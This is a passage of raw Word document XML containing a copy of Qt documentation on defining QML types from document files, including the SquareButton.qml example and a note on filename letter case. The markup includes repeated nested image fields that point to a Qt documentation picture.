        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4042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in;height:1in">
            <v:imagedata r:id="rId166" r:href="rId167"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This creates a 100 x 100 red</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with an inner</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as defined in</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When this</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myapplication.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document is loaded by the engine, it loads the SquareButton.qml document as a component and instantiates it to create a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type encapsulates </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the tree of QML objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> declared in</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When the QML engine instantiates a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object from this type, it is instantiating an object from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tree declared in</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">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b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the letter case of the file name is significant on some (notably UNIX) filesystems. It is recommended the file name case matches the case of the desired QML type name exactly - for example,</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Box.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and not</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BoX.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- regardless of the platform to which the QML type will be deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00944C21">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="importing-types-defined-outside-the-curr"/>
      <w:bookmarkStart w:id="240" w:name="_Toc483000583"/>
      <w:bookmarkStart w:id="241" w:name="_Toc483003604"/>
      <w:bookmarkStart w:id="242" w:name="_Toc483603935"/>
      <w:bookmarkStart w:id="243" w:name="_Toc483605155"/>
      <w:bookmarkEnd w:id="239"/>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Importing Types Defined Outside the Current Directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
